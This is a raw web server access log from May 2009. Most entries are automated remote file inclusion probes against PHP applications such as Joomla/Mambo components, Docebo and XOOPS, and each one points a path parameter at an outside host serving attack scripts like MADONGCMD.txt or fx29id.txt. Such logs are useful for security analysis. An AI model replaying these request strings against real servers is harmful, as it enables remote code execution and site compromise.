88.84.128.40 - - [16/May/2009:00:13:25 -0400] "GET //components/com_thopper/inc/contact_type.php?mosConfig_absolute_path=http://www.mamet.wen.ru/MADONGCMD.txt?? HTTP/1.1" 404 242 "-" "libwww-perl/5.803"
88.84.128.40 - - [16/May/2009:00:13:25 -0400] "GET /logs//components/com_thopper/inc/contact_type.php?mosConfig_absolute_path=http://www.mamet.wen.ru/MADONGCMD.txt?? HTTP/1.1" 404 247 "-" "libwww-perl/5.803"
88.84.128.40 - - [16/May/2009:00:13:31 -0400] "GET /logs/access_log.Q108101700//components/com_zoom/includes/database.php?mosConfig_absolute_path=http://www.mamet.wen.ru/MADONGCMD.txt?? HTTP/1.1" 404 267 "-" "libwww-perl/5.803"
88.84.128.40 - - [16/May/2009:00:13:31 -0400] "GET //components/com_zoom/includes/database.php?mosConfig_absolute_path=http://www.mamet.wen.ru/MADONGCMD.txt?? HTTP/1.1" 404 240 "-" "libwww-perl/5.803"
88.84.128.40 - - [16/May/2009:00:13:31 -0400] "GET /logs//components/com_zoom/includes/database.php?mosConfig_absolute_path=http://www.mamet.wen.ru/MADONGCMD.txt?? HTTP/1.1" 404 245 "-" "libwww-perl/5.803"
58.227.193.198 - - [16/May/2009:00:13:34 -0400] "GET /logs/access_log.Q108092300%20%20//zero_vote/ask_password.php?dir=http://www.mastercraftplumbing.com/help/copyright.txt???? HTTP/1.1" 404 254 "-" "Mozilla/5.0"
87.106.135.14 - - [16/May/2009:00:13:45 -0400] "GET /logs/access_log.Q108091800//components/com_thopper/inc/contact_type.php?mosConfig_absolute_path=http://www.mamet.wen.ru/MADONGCMD.txt?? HTTP/1.1" 404 269 "-" "libwww-perl/5.805"
58.227.193.198 - - [16/May/2009:00:13:53 -0400] "GET /logs/access_log.Q109050700%20%20//zero_vote/ask_password.php?dir=http://www.mastercraftplumbing.com/help/copyright.txt???? HTTP/1.1" 404 254 "-" "Mozilla/5.0"
88.84.128.40 - - [16/May/2009:00:13:55 -0400] "GET /logs/access_log.Q108091800//components/com_thopper/inc/contact_type.php?mosConfig_absolute_path=http://www.mamet.wen.ru/MADONGCMD.txt?? HTTP/1.1" 404 269 "-" "libwww-perl/5.803"
72.52.230.168 - - [16/May/2009:00:15:11 -0400] "GET /logs/access_log.Q109051200//zero_vote/ask_password.php?dir=http://www.mastercraftplumbing.com/help/copyright.txt???? HTTP/1.1" 404 252 "-" "Mozilla/5.0"
209.59.12.99 - - [16/May/2009:00:15:55 -0400] "GET / HTTP/1.0" 200 409 "-" "check_http/1.81 (nagios-plugins 1.4)"
66.249.72.114 - - [16/May/2009:00:16:13 -0400] "GET /CGI-BIN/LANSAWEB?WEBEVENT+L001BC44C0881C900F30C05L+M37+ENG HTTP/1.1" 500 197 "-" "Mozilla/5.0 (compatible; Googlebot/2.1; +http://www.google.com/bot.html)"
66.249.72.114 - - [16/May/2009:00:16:23 -0400] "GET /CGI-BIN/LANSAWEB?WEBEVENT+L0058EE471230390065AB06G+M37+ENG HTTP/1.1" 500 197 "-" "Mozilla/5.0 (compatible; Googlebot/2.1; +http://www.google.com/bot.html)"
212.150.52.114 - - [16/May/2009:00:16:24 -0400] "GET /logs/access_log.Q108061500%20%20//xoopsgallery/init_basic.php?GALLERY_BASEDIR=http://theblythes.net/cal/mydb?? HTTP/1.1" 404 255 "-" "Mozilla/5.0"
212.150.52.114 - - [16/May/2009:00:16:24 -0400] "GET /logs/access_log.Q108120600%20%20//xoopsgallery/init_basic.php?GALLERY_BASEDIR=http://theblythes.net/cal/mydb?? HTTP/1.1" 404 255 "-" "Mozilla/5.0"
212.150.52.114 - - [16/May/2009:00:16:33 -0400] "GET /logs/access_log.Q108061500%20%20//xoopsgallery/init_basic.php?GALLERY_BASEDIR=http://theblythes.net/cal/mydb?? HTTP/1.1" 404 255 "-" "Mozilla/5.0"
212.150.52.114 - - [16/May/2009:00:16:33 -0400] "GET /logs/access_log.Q108120600%20%20//xoopsgallery/init_basic.php?GALLERY_BASEDIR=http://theblythes.net/cal/mydb?? HTTP/1.1" 404 255 "-" "Mozilla/5.0"
66.249.72.114 - - [16/May/2009:00:16:34 -0400] "GET /CGI-BIN/LANSAWEB?WEBEVENT+L0058EE4711B0E9006EAB06G+M37+ENG HTTP/1.1" 500 197 "-" "Mozilla/5.0 (compatible; Googlebot/2.1; +http://www.google.com/bot.html)"
212.150.52.114 - - [16/May/2009:00:16:34 -0400] "GET /logs/access_log.Q108061500%20%20//xoopsgallery/init_basic.php?GALLERY_BASEDIR=http://theblythes.net/cal/mydb?? HTTP/1.1" 404 255 "-" "Mozilla/5.0"
212.150.52.114 - - [16/May/2009:00:16:34 -0400] "GET /logs/access_log.Q108120600%20%20//xoopsgallery/init_basic.php?GALLERY_BASEDIR=http://theblythes.net/cal/mydb?? HTTP/1.1" 404 255 "-" "Mozilla/5.0"
217.18.76.16 - - [16/May/2009:00:16:46 -0400] "GET /logs/access_log.Q108112200//components/com_thopper/inc/contact_type.php?mosConfig_absolute_path=http://www.mamet.wen.ru/MADONGCMD.txt?? HTTP/1.1" 404 269 "-" "libwww-perl/5.805"
217.18.76.16 - - [16/May/2009:00:16:46 -0400] "GET //components/com_thopper/inc/contact_type.php?mosConfig_absolute_path=http://www.mamet.wen.ru/MADONGCMD.txt?? HTTP/1.1" 404 242 "-" "libwww-perl/5.805"
217.18.76.16 - - [16/May/2009:00:16:46 -0400] "GET /logs//components/com_thopper/inc/contact_type.php?mosConfig_absolute_path=http://www.mamet.wen.ru/MADONGCMD.txt?? HTTP/1.1" 404 247 "-" "libwww-perl/5.805"
212.150.52.114 - - [16/May/2009:00:16:49 -0400] "GET /logs/access_log.Q108120600%20%20//xoopsgallery/init_basic.php?GALLERY_BASEDIR=http://theblythes.net/cal/mydb?? HTTP/1.1" 404 255 "-" "Mozilla/5.0"
212.150.52.114 - - [16/May/2009:00:16:49 -0400] "GET /logs/access_log.Q108061500%20%20//xoopsgallery/init_basic.php?GALLERY_BASEDIR=http://theblythes.net/cal/mydb?? HTTP/1.1" 404 255 "-" "Mozilla/5.0"
212.150.52.114 - - [16/May/2009:00:17:02 -0400] "GET /logs/access_log.Q108061500%20%20//xoopsgallery/init_basic.php?GALLERY_BASEDIR=http://jeta.co.kr//bbs/component/.jpg/fx29id.txt?? HTTP/1.1" 404 255 "-" "Mozilla/5.0"
212.150.52.114 - - [16/May/2009:00:17:05 -0400] "GET /logs/access_log.Q108120600%20%20//xoopsgallery/init_basic.php?GALLERY_BASEDIR=http://jeta.co.kr//bbs/component/.jpg/fx29id.txt?? HTTP/1.1" 404 255 "-" "Mozilla/5.0"
69.172.92.14 - - [16/May/2009:00:17:06 -0400] "GET /logs//components/com_thopper/inc/contact_type.php?mosConfig_absolute_path=http://www.mamet.wen.ru/MADONGCMD.txt?? HTTP/1.1" 404 247 "-" "libwww-perl/5.803"
69.172.92.14 - - [16/May/2009:00:17:06 -0400] "GET //components/com_thopper/inc/contact_type.php?mosConfig_absolute_path=http://www.mamet.wen.ru/MADONGCMD.txt?? HTTP/1.1" 404 242 "-" "libwww-perl/5.803"
212.150.52.114 - - [16/May/2009:00:17:23 -0400] "GET /logs/access_log.Q108061500%20%20//xoopsgallery/init_basic.php?GALLERY_BASEDIR=http://theblythes.net/cal/mydb?? HTTP/1.1" 404 255 "-" "Mozilla/5.0"
212.150.52.114 - - [16/May/2009:00:17:24 -0400] "GET /logs/access_log.Q108120600%20%20//xoopsgallery/init_basic.php?GALLERY_BASEDIR=http://theblythes.net/cal/mydb?? HTTP/1.1" 404 255 "-" "Mozilla/5.0"
66.232.102.70 - - [16/May/2009:00:17:25 -0400] "GET /logs//doceboCms/class/class.dashboard_cms.php?where_framework=http://flyozoneusa.com/tmp/rfi.txt??? HTTP/1.1" 404 243 "-" "libwww-perl/5.813"
66.232.102.70 - - [16/May/2009:00:17:25 -0400] "GET //doceboCms/class/class.dashboard_cms.php?where_framework=http://flyozoneusa.com/tmp/rfi.txt??? HTTP/1.1" 404 238 "-" "libwww-perl/5.813"
66.232.102.70 - - [16/May/2009:00:17:25 -0400] "GET /logs/access_log.Q108081300//doceboCms/class/class.dashboard_cms.php?where_framework=http://flyozoneusa.com/tmp/rfi.txt??? HTTP/1.1" 404 265 "-" "libwww-perl/5.813"
218.150.79.146 - - [16/May/2009:00:17:33 -0400] "GET ///?mosConfig_absolute_path=http://www.angelcitytrading.com/css/1.txt?? HTTP/1.1" 200 453 "-" "Mozilla/5.0"
218.150.79.146 - - [16/May/2009:00:17:33 -0400] "GET /logs///?mosConfig_absolute_path=http://www.angelcitytrading.com/css/1.txt?? HTTP/1.1" 200 1558 "-" "Mozilla/5.0"
218.150.79.146 - - [16/May/2009:00:17:33 -0400] "GET /logs/access_log.Q109021900%20%20///?mosConfig_absolute_path=http://www.angelcitytrading.com/css/1.txt?? HTTP/1.1" 404 229 "-" "Mozilla/5.0"
195.135.148.59 - - [16/May/2009:00:17:36 -0400] "GET /inc/functions.inc.php?config[ppa_root_path]=http://212.227.74.68/catalog/fx29id.txt?? HTTP/1.1" 404 219 "-" "Mozilla/5.0"
195.135.148.59 - - [16/May/2009:00:17:36 -0400] "GET /logs/inc/functions.inc.php?config[ppa_root_path]=http://212.227.74.68/catalog/fx29id.txt?? HTTP/1.1" 404 224 "-" "Mozilla/5.0"
66.232.102.70 - - [16/May/2009:00:17:36 -0400] "GET /logs/access_log.Q108072000//doceboCms/class/class.dashboard_cms.php?where_framework=http://flyozoneusa.com/tmp/rfi.txt??? HTTP/1.1" 404 265 "-" "libwww-perl/5.813"
67.19.228.18 - - [16/May/2009:00:17:42 -0400] "GET //doceboCms/class/class.dashboard_cms.php?where_framework=http://www.steannareptile.it//administrator/id1.txt?? HTTP/1.1" 404 238 "-" "Mozilla/5.0"
67.19.228.18 - - [16/May/2009:00:17:42 -0400] "GET /logs//doceboCms/class/class.dashboard_cms.php?where_framework=http://www.steannareptile.it//administrator/id1.txt?? HTTP/1.1" 404 243 "-" "Mozilla/5.0"
67.19.228.18 - - [16/May/2009:00:17:42 -0400] "GET /logs/access_log.Q108081300//doceboCms/class/class.dashboard_cms.php?where_framework=http://www.steannareptile.it//administrator/id1.txt?? HTTP/1.1" 404 265 "-" "Mozilla/5.0"
67.19.228.18 - - [16/May/2009:00:17:44 -0400] "GET //doceboCms/class/class.dashboard_cms.php?where_framework=http://www.steannareptile.it//administrator/id1.txt?? HTTP/1.1" 404 238 "-" "Mozilla/5.0"
67.19.228.18 - - [16/May/2009:00:17:44 -0400] "GET /logs//doceboCms/class/class.dashboard_cms.php?where_framework=http://www.steannareptile.it//administrator/id1.txt?? HTTP/1.1" 404 243 "-" "Mozilla/5.0"
67.19.228.18 - - [16/May/2009:00:17:44 -0400] "GET /logs/access_log.Q108081300//doceboCms/class/class.dashboard_cms.php?where_framework=http://www.steannareptile.it//administrator/id1.txt?? HTTP/1.1" 404 265 "-" "Mozilla/5.0"
67.19.228.18 - - [16/May/2009:00:17:45 -0400] "GET //doceboCms/class/class.dashboard_cms.php?where_framework=http://www.steannareptile.it//administrator/id1.txt?? HTTP/1.1" 404 238 "-" "Mozilla/5.0"
67.19.228.18 - - [16/May/2009:00:17:45 -0400] "GET /logs//doceboCms/class/class.dashboard_cms.php?where_framework=http://www.steannareptile.it//administrator/id1.txt?? HTTP/1.1" 404 243 "-" "Mozilla/5.0"
67.19.228.18 - - [16/May/2009:00:17:45 -0400] "GET /logs/access_log.Q108081300//doceboCms/class/class.dashboard_cms.php?where_framework=http://www.steannareptile.it//administrator/id1.txt?? HTTP/1.1" 404 265 "-" "Mozilla/5.0"
67.19.228.18 - - [16/May/2009:00:17:46 -0400] "GET /logs/access_log.Q108072000//doceboCms/class/class.dashboard_cms.php?where_framework=http://www.steannareptile.it//administrator/id1.txt?? HTTP/1.1" 404 265 "-" "Mozilla/5.0"
67.19.228.18 - - [16/May/2009:00:17:48 -0400] "GET /logs/access_log.Q108072000//doceboCms/class/class.dashboard_cms.php?where_framework=http://www.steannareptile.it//administrator/id1.txt?? HTTP/1.1" 404 265 "-" "Mozilla/5.0"
67.19.228.18 - - [16/May/2009:00:17:50 -0400] "GET /logs/access_log.Q108072000//doceboCms/class/class.dashboard_cms.php?where_framework=http://www.steannareptile.it//administrator/id1.txt?? HTTP/1.1" 404 265 "-" "Mozilla/5.0"
87.106.135.14 - - [16/May/2009:00:18:04 -0400] "GET /logs//components/com_thopper/inc/contact_type.php?mosConfig_absolute_path=http://www.mamet.wen.ru/MADONGCMD.txt?? HTTP/1.1" 404 247 "-" "libwww-perl/5.805"
87.106.135.14 - - [16/May/2009:00:18:04 -0400] "GET //components/com_thopper/inc/contact_type.php?mosConfig_absolute_path=http://www.mamet.wen.ru/MADONGCMD.txt?? HTTP/1.1" 404 242 "-" "libwww-perl/5.805"
84.92.197.113 - - [16/May/2009:00:18:09 -0400] "GET /zboard/view.php?id=artwork_notice&no=http://tugaspeed.info/fx29id.txt? HTTP/1.1" 404 213 "-" "Mozilla/5.0"
84.92.197.113 - - [16/May/2009:00:18:10 -0400] "GET /logs/zboard/view.php?id=artwork_notice&no=http://tugaspeed.info/fx29id.txt? HTTP/1.1" 404 218 "-" "Mozilla/5.0"
84.92.197.113 - - [16/May/2009:00:18:10 -0400] "GET /logs/access_log.Q108101700/zboard/view.php?id=artwork_notice&no=http://tugaspeed.info/fx29id.txt? HTTP/1.1" 404 240 "-" "Mozilla/5.0"
222.122.26.5 - - [16/May/2009:00:18:16 -0400] "GET /logs//index.php?option=com_mambowiki&Itemid=&mosConfig_absolute_path=http://www.wizard.com.br/fx29id.txt?? HTTP/1.1" 404 213 "-" "Mozilla/5.0"
222.122.26.5 - - [16/May/2009:00:18:16 -0400] "GET /logs/access_log.Q108072200//index.php?option=com_mambowiki&Itemid=&mosConfig_absolute_path=http://www.wizard.com.br/fx29id.txt?? HTTP/1.1" 404 235 "-" "Mozilla/5.0"
222.122.26.5 - - [16/May/2009:00:18:19 -0400] "GET /logs/access_log.Q108090200//index.php?option=com_mambowiki&Itemid=&mosConfig_absolute_path=http://www.wizard.com.br/fx29id.txt?? HTTP/1.1" 404 235 "-" "Mozilla/5.0"
222.122.26.5 - - [16/May/2009:00:18:19 -0400] "GET //index.php?option=com_mambowiki&Itemid=&mosConfig_absolute_path=http://www.wizard.com.br/fx29id.txt?? HTTP/1.1" 404 208 "-" "Mozilla/5.0"
210.118.194.200 - - [16/May/2009:00:18:26 -0400] "GET //?_zb_path=http://pallmall4.fileave.com/id.txt?? HTTP/1.1" 200 452 "-" "Mozilla/5.0"
210.118.194.200 - - [16/May/2009:00:18:26 -0400] "GET /logs//?_zb_path=http://pallmall4.fileave.com/id.txt?? HTTP/1.1" 200 1557 "-" "Mozilla/5.0"
84.92.197.113 - - [16/May/2009:00:18:27 -0400] "GET /logs/access_log.Q108112200/zboard/view.php?id=artwork_notice&no=http://tugaspeed.info/fx29id.txt? HTTP/1.1" 404 240 "-" "Mozilla/5.0"
87.106.135.14 - - [16/May/2009:00:18:39 -0400] "GET /logs/access_log.Q108052400//components/com_zoom/includes/database.php?mosConfig_absolute_path=http://www.mamet.wen.ru/MADONGCMD.txt?? HTTP/1.1" 404 267 "-" "libwww-perl/5.805"
218.150.79.146 - - [16/May/2009:00:18:53 -0400] "GET /logs/access_log.Q109021900///?mosConfig_absolute_path=http://www.angelcitytrading.com/css/1.txt?? HTTP/1.1" 404 227 "-" "Mozilla/5.0"
218.150.79.146 - - [16/May/2009:00:18:54 -0400] "GET /logs/access_log.Q109032800///?mosConfig_absolute_path=http://www.angelcitytrading.com/css/1.txt?? HTTP/1.1" 404 227 "-" "Mozilla/5.0"
87.106.135.14 - - [16/May/2009:00:19:13 -0400] "GET /logs/access_log.Q108052400//components/com_zoom/includes/database.php?mosConfig_absolute_path=http://www.mamet.wen.ru/MADONGCMD.txt?? HTTP/1.1" 404 267 "-" "libwww-perl/5.805"
67.19.228.18 - - [16/May/2009:00:19:29 -0400] "GET /logs/access_log.Q108060200//doceboCms/class/class.dashboard_cms.php?where_framework=http://www.steannareptile.it//administrator/id1.txt?? HTTP/1.1" 404 265 "-" "Mozilla/5.0"
88.84.128.40 - - [16/May/2009:00:19:32 -0400] "GET /logs//components/com_thopper/inc/contact_type.php?mosConfig_absolute_path=http://www.mamet.wen.ru/MADONGCMD.txt?? HTTP/1.1" 404 247 "-" "libwww-perl/5.803"
88.84.128.40 - - [16/May/2009:00:19:32 -0400] "GET //components/com_thopper/inc/contact_type.php?mosConfig_absolute_path=http://www.mamet.wen.ru/MADONGCMD.txt?? HTTP/1.1" 404 242 "-" "libwww-perl/5.803"
218.150.79.146 - - [16/May/2009:00:19:42 -0400] "GET /logs/access_log.Q108070500///?mosConfig_absolute_path=http://www.angelcitytrading.com/css/1.txt?? HTTP/1.1" 404 227 "-" "Mozilla/5.0"
218.150.79.146 - - [16/May/2009:00:19:42 -0400] "GET /logs/access_log.Q108052400///?mosConfig_absolute_path=http://www.angelcitytrading.com/css/1.txt?? HTTP/1.1" 404 227 "-" "Mozilla/5.0"
211.115.89.68 - - [16/May/2009:00:19:56 -0400] "GET /inc/functions.inc.php?config[ppa_root_path]=http://jeta.co.kr//bbs/component/.jpg/fx29id.txt?? HTTP/1.1" 404 219 "-" "Mozilla/5.0"
211.115.89.68 - - [16/May/2009:00:19:56 -0400] "GET /logs/inc/functions.inc.php?config[ppa_root_path]=http://jeta.co.kr//bbs/component/.jpg/fx29id.txt?? HTTP/1.1" 404 224 "-" "Mozilla/5.0"
67.19.228.18 - - [16/May/2009:00:20:01 -0400] "GET /logs/access_log.Q108081300%20%20//doceboCms/class/class.dashboard_cms.php?where_framework=http://www.steannareptile.it//administrator/id1.txt?? HTTP/1.1" 404 267 "-" "Mozilla/5.0"
67.19.228.18 - - [16/May/2009:00:20:05 -0400] "GET /logs/access_log.Q108072000%20%20//doceboCms/class/class.dashboard_cms.php?where_framework=http://www.steannareptile.it//administrator/id1.txt?? HTTP/1.1" 404 267 "-" "Mozilla/5.0"
88.84.128.40 - - [16/May/2009:00:20:10 -0400] "GET /logs/access_log.Q108052400//components/com_zoom/includes/database.php?mosConfig_absolute_path=http://www.mamet.wen.ru/MADONGCMD.txt?? HTTP/1.1" 404 267 "-" "libwww-perl/5.803"
217.147.29.190 - - [16/May/2009:00:20:13 -0400] "GET /logs/access_log.Q108090100//index.php/component/option,com_juser/components/com_juser/xajak_functions.php?mosConfig_absolute_path=http://www.geocities.com/sandy_zazmit/fx29id1.txt?? HTTP/1.1" 404 303 "-" "Mozilla/5.0"
217.147.29.190 - - [16/May/2009:00:20:13 -0400] "GET /logs//index.php/component/option,com_juser/components/com_juser/xajak_functions.php?mosConfig_absolute_path=http://www.geocities.com/sandy_zazmit/fx29id1.txt?? HTTP/1.1" 404 281 "-" "Mozilla/5.0"
217.147.29.190 - - [16/May/2009:00:20:15 -0400] "GET //index.php/component/option,com_juser/components/com_juser/xajak_functions.php?mosConfig_absolute_path=http://www.geocities.com/sandy_zazmit/fx29id1.txt?? HTTP/1.1" 404 276 "-" "Mozilla/5.0"
217.147.29.190 - - [16/May/2009:00:20:18 -0400] "GET /logs/access_log.Q108092700//index.php/component/option,com_juser/components/com_juser/xajak_functions.php?mosConfig_absolute_path=http://www.geocities.com/sandy_zazmit/fx29id1.txt?? HTTP/1.1" 404 303 "-" "Mozilla/5.0"
88.84.128.40 - - [16/May/2009:00:20:31 -0400] "GET /logs/access_log.Q108052400//components/com_zoom/includes/database.php?mosConfig_absolute_path=http://www.mamet.wen.ru/MADONGCMD.txt?? HTTP/1.1" 404 267 "-" "libwww-perl/5.803"
67.19.228.18 - - [16/May/2009:00:20:36 -0400] "GET /logs/access_log.Q108081300%20%20//doceboCms/class/class.dashboard_cms.php?where_framework=http://www.steannareptile.it//administrator/id1.txt?? HTTP/1.1" 404 267 "-" "Mozilla/5.0"
217.147.29.190 - - [16/May/2009:00:20:38 -0400] "GET //index.php/component/option,com_juser/components/com_juser/xajak_functions.php?mosConfig_absolute_path=http://www.geocities.com/sandy_zazmit/fx29id1.txt?? HTTP/1.1" 404 276 "-" "Mozilla/5.0"
217.147.29.190 - - [16/May/2009:00:20:38 -0400] "GET /logs//index.php/component/option,com_juser/components/com_juser/xajak_functions.php?mosConfig_absolute_path=http://www.geocities.com/sandy_zazmit/fx29id1.txt?? HTTP/1.1" 404 281 "-" "Mozilla/5.0"
217.147.29.190 - - [16/May/2009:00:20:38 -0400] "GET /logs/access_log.Q108090100//index.php/component/option,com_juser/components/com_juser/xajak_functions.php?mosConfig_absolute_path=http://www.geocities.com/sandy_zazmit/fx29id1.txt?? HTTP/1.1" 404 303 "-" "Mozilla/5.0"
67.19.228.18 - - [16/May/2009:00:20:41 -0400] "GET /logs/access_log.Q108072000%20%20//doceboCms/class/class.dashboard_cms.php?where_framework=http://www.steannareptile.it//administrator/id1.txt?? HTTP/1.1" 404 267 "-" "Mozilla/5.0"
217.147.29.190 - - [16/May/2009:00:20:45 -0400] "GET /logs/access_log.Q108092700//index.php/component/option,com_juser/components/com_juser/xajak_functions.php?mosConfig_absolute_path=http://www.geocities.com/sandy_zazmit/fx29id1.txt?? HTTP/1.1" 404 303 "-" "Mozilla/5.0"
67.19.228.18 - - [16/May/2009:00:20:47 -0400] "GET /logs/access_log.Q108081300%20%20//doceboCms/class/class.dashboard_cms.php?where_framework=http://www.steannareptile.it//administrator/id1.txt?? HTTP/1.1" 404 267 "-" "Mozilla/5.0"
67.19.228.18 - - [16/May/2009:00:20:53 -0400] "GET /logs/access_log.Q108072000%20%20//doceboCms/class/class.dashboard_cms.php?where_framework=http://www.steannareptile.it//administrator/id1.txt?? HTTP/1.1" 404 267 "-" "Mozilla/5.0"
209.59.12.99 - - [16/May/2009:00:20:54 -0400] "GET / HTTP/1.0" 200 409 "-" "check_http/1.81 (nagios-plugins 1.4)"
217.18.76.16 - - [16/May/2009:00:20:59 -0400] "GET /logs/access_log.Q108082000//components/com_thopper/inc/contact_type.php?mosConfig_absolute_path=http://www.mamet.wen.ru/MADONGCMD.txt?? HTTP/1.1" 404 269 "-" "libwww-perl/5.805"
69.172.92.14 - - [16/May/2009:00:21:02 -0400] "GET /logs//components/com_thopper/inc/contact_type.php?mosConfig_absolute_path=http://www.mamet.wen.ru/MADONGCMD.txt?? HTTP/1.1" 404 247 "-" "libwww-perl/5.803"
69.172.92.14 - - [16/May/2009:00:21:02 -0400] "GET //components/com_thopper/inc/contact_type.php?mosConfig_absolute_path=http://www.mamet.wen.ru/MADONGCMD.txt?? HTTP/1.1" 404 242 "-" "libwww-perl/5.803"
222.122.26.5 - - [16/May/2009:00:21:10 -0400] "GET /logs/access_log.Q108090200%20%20//index.php?option=com_mambowiki&Itemid=&mosConfig_absolute_path=http://www.wizard.com.br/fx29id.txt?? HTTP/1.1" 404 237 "-" "Mozilla/5.0"
222.122.26.5 - - [16/May/2009:00:21:44 -0400] "GET /logs/access_log.Q108072200%20%20//index.php?option=com_mambowiki&Itemid=&mosConfig_absolute_path=http://www.wizard.com.br/fx29id.txt?? HTTP/1.1" 404 237 "-" "Mozilla/5.0"
69.172.92.14 - - [16/May/2009:00:21:54 -0400] "GET /logs/access_log.Q108090200//components/com_sitemap/sitemap.php?mosConfig_admin_path=http://www.mamet.wen.ru/MADONGCMD.txt?? HTTP/1.1" 404 260 "-" "libwww-perl/5.803"
69.172.92.14 - - [16/May/2009:00:21:54 -0400] "GET //components/com_sitemap/sitemap.php?mosConfig_admin_path=http://www.mamet.wen.ru/MADONGCMD.txt?? HTTP/1.1" 404 233 "-" "libwww-perl/5.803"
69.172.92.14 - - [16/May/2009:00:21:54 -0400] "GET /logs//components/com_sitemap/sitemap.php?mosConfig_admin_path=http://www.mamet.wen.ru/MADONGCMD.txt?? HTTP/1.1" 404 238 "-" "libwww-perl/5.803"
58.227.193.198 - - [16/May/2009:00:21:56 -0400] "GET /logs/access_log.Q109051200//zero_vote/ask_password.php?dir=http://www.mastercraftplumbing.com/help/copyright.txt???? HTTP/1.1" 404 252 "-" "Mozilla/5.0"
87.106.135.14 - - [16/May/2009:00:21:58 -0400] "GET /logs/access_log.Q108090200//components/com_sitemap/sitemap.php?mosConfig_admin_path=http://www.mamet.wen.ru/MADONGCMD.txt?? HTTP/1.1" 404 260 "-" "libwww-perl/5.805"
87.106.135.14 - - [16/May/2009:00:21:59 -0400] "GET //components/com_sitemap/sitemap.php?mosConfig_admin_path=http://www.mamet.wen.ru/MADONGCMD.txt?? HTTP/1.1" 404 233 "-" "libwww-perl/5.805"
87.106.135.14 - - [16/May/2009:00:21:59 -0400] "GET /logs//components/com_sitemap/sitemap.php?mosConfig_admin_path=http://www.mamet.wen.ru/MADONGCMD.txt?? HTTP/1.1" 404 238 "-" "libwww-perl/5.805"
88.84.128.40 - - [16/May/2009:00:22:16 -0400] "GET /logs/access_log.Q108090200//components/com_sitemap/sitemap.php?mosConfig_admin_path=http://www.mamet.wen.ru/MADONGCMD.txt?? HTTP/1.1" 404 260 "-" "libwww-perl/5.803"
88.84.128.40 - - [16/May/2009:00:22:16 -0400] "GET //components/com_sitemap/sitemap.php?mosConfig_admin_path=http://www.mamet.wen.ru/MADONGCMD.txt?? HTTP/1.1" 404 233 "-" "libwww-perl/5.803"
88.84.128.40 - - [16/May/2009:00:22:16 -0400] "GET /logs//components/com_sitemap/sitemap.php?mosConfig_admin_path=http://www.mamet.wen.ru/MADONGCMD.txt?? HTTP/1.1" 404 238 "-" "libwww-perl/5.803"
69.90.72.88 - - [16/May/2009:00:22:21 -0400] "GET /zboard/view.php?id=artwork_notice&no=http://indoirc.go.ro/idscan.txt??? HTTP/1.1" 404 213 "-" "libwww-perl/5.805"
217.147.29.190 - - [16/May/2009:00:22:26 -0400] "GET /logs/access_log.Q108090100%20%20//index.php/component/option,com_juser/components/com_juser/xajak_functions.php?mosConfig_absolute_path=http://www.geocities.com/sandy_zazmit/fx29id1.txt?? HTTP/1.1" 404 305 "-" "Mozilla/5.0"
217.147.29.190 - - [16/May/2009:00:22:29 -0400] "GET /logs/access_log.Q108090100%20%20//index.php/component/option,com_juser/components/com_juser/xajak_functions.php?mosConfig_absolute_path=http://www.geocities.com/sandy_zazmit/fx29id1.txt?? HTTP/1.1" 404 305 "-" "Mozilla/5.0"
217.147.29.190 - - [16/May/2009:00:22:29 -0400] "GET /logs/access_log.Q108092700%20%20//index.php/component/option,com_juser/components/com_juser/xajak_functions.php?mosConfig_absolute_path=http://www.geocities.com/sandy_zazmit/fx29id1.txt?? HTTP/1.1" 404 305 "-" "Mozilla/5.0"
217.147.29.190 - - [16/May/2009:00:22:32 -0400] "GET /logs/access_log.Q108092700%20%20//index.php/component/option,com_juser/components/com_juser/xajak_functions.php?mosConfig_absolute_path=http://www.geocities.com/sandy_zazmit/fx29id1.txt?? HTTP/1.1" 404 305 "-" "Mozilla/5.0"
217.18.76.16 - - [16/May/2009:00:23:00 -0400] "GET /logs//components/com_thopper/inc/contact_type.php?mosConfig_absolute_path=http://www.mamet.wen.ru/MADONGCMD.txt?? HTTP/1.1" 404 247 "-" "libwww-perl/5.805"
217.18.76.16 - - [16/May/2009:00:23:00 -0400] "GET //components/com_thopper/inc/contact_type.php?mosConfig_absolute_path=http://www.mamet.wen.ru/MADONGCMD.txt?? HTTP/1.1" 404 242 "-" "libwww-perl/5.805"
72.30.79.49 - - [16/May/2009:00:23:04 -0400] "GET /logs/error_log.Q107080900 HTTP/1.0" 404 223 "-" "Mozilla/5.0 (compatible; Yahoo! Slurp/3.0; http://help.yahoo.com/help/us/ysearch/slurp)"
222.122.26.5 - - [16/May/2009:00:23:09 -0400] "GET /index.php?stranica=http://www.wizard.com.br/fx29id.txt?? HTTP/1.1" 404 207 "-" "Mozilla/5.0"
222.122.26.5 - - [16/May/2009:00:23:09 -0400] "GET /logs/index.php?stranica=http://www.wizard.com.br/fx29id.txt?? HTTP/1.1" 404 212 "-" "Mozilla/5.0"
87.106.135.14 - - [16/May/2009:00:23:21 -0400] "GET /logs//components/com_thopper/inc/contact_type.php?mosConfig_absolute_path=http://www.mamet.wen.ru/MADONGCMD.txt?? HTTP/1.1" 404 247 "-" "libwww-perl/5.805"
87.106.135.14 - - [16/May/2009:00:23:21 -0400] "GET //components/com_thopper/inc/contact_type.php?mosConfig_absolute_path=http://www.mamet.wen.ru/MADONGCMD.txt?? HTTP/1.1" 404 242 "-" "libwww-perl/5.805"
